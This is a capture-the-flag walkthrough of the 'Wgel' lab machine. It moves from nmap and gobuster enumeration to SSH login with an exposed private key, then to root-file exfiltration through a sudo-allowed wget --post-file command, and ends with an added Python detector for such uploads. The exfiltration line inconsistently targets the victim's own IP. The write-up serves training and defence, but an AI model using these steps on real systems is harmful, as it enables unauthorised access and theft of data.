Wgel CTF

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.139.244

Detailed Nmap scan:

Command breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22 and 80

  • (-oN nmap): Saving the output to a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.139.244

Enumeration

Let's visit port 80, the web server.

It's a default Apache2 page. I made sure to check the source code and found something interesting.

We now have a possible username, Jessie. There is nothing else of interest, so let's run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.139.244/

We found a hidden directory; let's go check it out.

It is a very well-made website. Let's run gobuster against it in the background while we explore the page.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.139.244/sitemap

Looking at the website, most of the buttons work and are functional. The gobuster results are in; let's check them.

There is a /.ssh directory, which is really interesting; let's take a look.

We have an id_rsa file, which means that if we recover its passphrase with John the Ripper, we can log in through SSH.

Let's first open the file, copy its contents, and paste them into our own id_rsa file.

Now let's extract the hash with ssh2john so John can find the passphrase:

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

Oh, it looks like the key has no passphrase, so we can log in directly.

chmod 600 id_rsa
ssh jessie@10.10.139.244 -i id_rsa

We are logged in. We can now read the user.txt file.

Privilege Escalation

Let's run sudo -l to check what we can run as root.

sudo -l

It looks like we can run /usr/bin/wget as root. Since wget can also send files, we can try to post the root flag file to our machine. First we need to start an HTTP server to receive it:

python3 -m http.server 8080

We also have to start a netcat listener.

Now let's use this command to send the root flag to our machine. We cannot be sure of the root flag's file name, but from how the user flag was named we can guess it:

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.10.139.244

After you hit enter, the listener receives the contents of the file.

This is the root flag.
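As an added, defender-side example (not part of the original writeup): a small Python check that scans the sudo entries in auth.log and flags wget runs as root that upload a local file, which is exactly the trace the --post-file step above leaves behind. The log lines are constructed for this example (the hostname "wgel" and timestamps are made up); the command and IP are the ones used on this page.

```python
import re

# Constructed sample lines in the format sudo writes to auth.log.
# They are made up for this example, not output captured from the box.
SAMPLE_LOG = """\
Jan 10 12:00:01 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=list
Jan 10 12:00:30 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://10.10.139.244
Jan 10 12:01:00 wgel sudo:   admin : TTY=pts/1 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt update
Jan 10 12:02:00 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget http://mirror.example/pkg.deb -O /tmp/pkg.deb
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# wget options that read a local file and send its contents over the network.
EXFIL_OPTS = ("--post-file", "--body-file")

def parse_sudo_line(line):
    """Split one sudo log line into invoking user, target user and command."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    return {"user": m.group("user"), "target": m.group("target"), "cmd": m.group("cmd")}

def is_wget_exfil(cmd):
    """True when the command is wget invoked with an option that uploads a local file."""
    argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "wget":
        return False
    return any(a.startswith(o) for a in argv for o in EXFIL_OPTS)

def uploaded_path(cmd):
    """Return the local file named by --post-file=/--body-file=, if any."""
    for a in cmd.split():
        for o in EXFIL_OPTS:
            if a.startswith(o + "="):
                return a.split("=", 1)[1]
    return None

def find_alerts(log_text):
    """Return (user, path) for each sudo-as-root wget upload in the log."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec and rec["target"] == "root" and is_wget_exfil(rec["cmd"]):
            alerts.append((rec["user"], uploaded_path(rec["cmd"])))
    return alerts

if __name__ == "__main__":
    for user, path in find_alerts(SAMPLE_LOG):
        print(f"ALERT: {user} used sudo wget to upload {path}")
```

The plain download on the last sample line is not flagged; only invocations that read a local file and send it are, so the check is quiet on ordinary package fetches.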
